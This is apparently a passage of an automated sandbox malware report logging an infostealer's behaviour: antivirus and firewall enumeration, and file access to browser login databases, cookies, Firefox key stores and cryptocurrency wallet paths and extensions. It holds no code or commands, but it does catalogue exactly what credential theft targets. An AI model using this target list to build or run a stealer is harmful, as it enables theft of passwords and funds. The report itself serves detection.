                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vC:\Users\All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eC:\Users\All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.000000000490D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Bypass.exe PID: 7004, type: MEMORYSTR
                      Source: Yara matchFile source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 572stuOQ0pZG2Xj.exe PID: 6792, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.000000000153C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.0000000001544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                      Source: RegAsm.exe, 0000000D.00000002.1946222478.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.000000000153C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: RegAsm.exe, 0000000D.00000002.1948665208.0000000001544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
